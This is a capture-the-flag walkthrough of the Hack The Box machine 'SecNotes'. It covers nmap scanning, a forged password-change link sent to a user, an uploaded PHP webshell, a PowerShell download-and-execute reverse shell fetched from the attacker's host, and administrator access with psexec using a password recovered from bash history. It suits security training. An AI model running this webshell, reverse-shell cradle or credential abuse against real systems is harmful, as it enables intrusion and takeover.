SecNotes

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.97 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed May 18 21:07:21 2022 as: nmap -sS -p- -n -Pn -oN allPorts 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.046s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
8808/tcp open  ssports-bcast

# Nmap done at Wed May 18 21:09:39 2022 -- 1 IP address (1 host up) scanned in 138.01 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,445,8808 10.10.10.97 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed May 18 21:14:15 2022 as: nmap -sCV -p80,445,8808 -Pn -oN targeted 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.27s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 2h20m02s, deviation: 4h02m29s, median: 2s
| smb2-time: 
|   date: 2022-05-18T19:14:35
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2022-05-18T12:14:32-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 18 21:15:10 2022 -- 1 IP address (1 host up) scanned in 55.27 seconds

Exploitation

If we take a look at the website, we'll see a login panel in which we can sign up.

Let's create a new user named alfa8sa with the password alfa8sa.

Then, log in with the new user.

We'll see four options. We can create a new note, change our password, sign out, or contact the website owners. Not only that, but we can also see a message showing the tyler@secnotes.htb user.

Let's try to change our password to alfa9sa.

Before hitting submit, let's set up BurpSuite, and intercept the request.

Let's try to change the request type method from POST to GET.

If the website still changes the password, we could try to send this URL to the tyler user, and if he accesses it, his password will be changed to alfa9sa. Let's forward the request and see if it changes our password.

And we see that the password has been changed. Now we could try to send the following URL to tyler, so if he accesses it, his password will change to alfa9sa.

http://passage.htb/change_pass.php?password=alfa9sa&confirm_password=alfa9sa&submit=submit

Let's press on the Contact Us button, and send the URL.

Now, let's sign out, and try to log is as the user tyler with the password alfa9sa.

And we should be able to log in.

There are three notes. The one called New Site contains a share name and some credentials.

Let's try to access it.

smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //secnotes.htb/new-site

• -U username and password separated by "%".

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Aug 19 20:06:14 2018
  ..                                  D        0  Sun Aug 19 20:06:14 2018
  iisstart.htm                        A      696  Thu Jun 21 17:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 17:26:03 2018

                7736063 blocks of size 4096. 3397922 blocks available

There are two files, which seem to be from an IIS website. We saw on the nmap scan, that there was another web server on port 8808.

We could try to upload a webshell to the share which contains the IIS file, and then access the webshell from the browser. First, create a new file called webshell.php with the following content.

<?php
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>

And then upload it to the Samba share.

smb: > put webshell.php

putting file webshell.php as \webshell.php (0.0 kb/s) (average 0.0 kb/s)

Then, we could execute commands by putting them on the cmd parameter from the following URL.

http://10.10.10.97:8808/webshell.php?cmd=whoami

Time to get a reverse shell. First, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory.

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1

Then, open it and paste the following line at the end of the file.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4444

Now, set an HTTP server on the current directory with python.

python -m http.server 80

Finally, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

If now we access the following URL, the machine will download the Invoke-PowerShellTcp.ps1 file from our machine, and then it will send us a reverse shell as the tyler user. Then we could grab the user flag.

http://10.10.10.97:8808/webshell.php?cmd=powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"

listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.97] 51465
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
secnotes\tyler
type \users\tyler\desktop\user.txt
fde104ffb6c4f8610383d039a9182470

Privilege Escalation

If we take a look at the desktop of the user tyler, we'll see a link file named bash.lnk. Which means that bash is probably installed in the system.

dir \users\tyler\desktop

    Directory: C:\users\tyler\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        6/22/2018   3:09 AM           1293 bash.lnk                                                              
-a----         8/2/2021   3:32 AM           1210 Command Prompt.lnk                                                    
-a----        4/11/2018   4:34 PM            407 File Explorer.lnk                                                     
-a----        6/21/2018   5:50 PM           1417 Microsoft Edge.lnk                                                    
-a----        6/21/2018   9:17 AM           1110 Notepad++.lnk                                                         
-ar---        5/19/2022   7:25 AM             34 user.txt                                                              
-a----        8/19/2018  10:59 AM           2494 Windows PowerShell.lnk

If we execute the whoami command with bash we'll see that we are the root user.

bash -c "whoami"

root

Let's see if the root flag is inside the /root directory.

bash -c "ls -la /root"

total 8
drwx------ 1 root root  512 Jun 22  2018 .                                                                                                                              
drwxr-xr-x 1 root root  512 Jun 21  2018 ..                                                                                                                             
---------- 1 root root  398 Jun 22  2018 .bash_history                                                                                                                  
-rw-r--r-- 1 root root 3112 Jun 22  2018 .bashrc                                                                                                                        
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile                                                                                                                       
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

There is no flag, but we see the .bash_history file with some content. Let's see what's in it.

bash -c "cat /root/.bash_history"

cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exit

We get the administrator credentials. Let's get a shell as the nt authority\system user on the machine with psexec utility from impacket. Then, all we have to do is reap the harvest and take the root flag.

impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file pCRSiJqK.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service bIED on 10.10.10.97.....
[*] Starting service bIED.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> whoami
nt authority\system

C:\WINDOWS\system32> type \users\administrator\desktop\root.txt
b05c9c122675dfcc403df0a8c75d29b9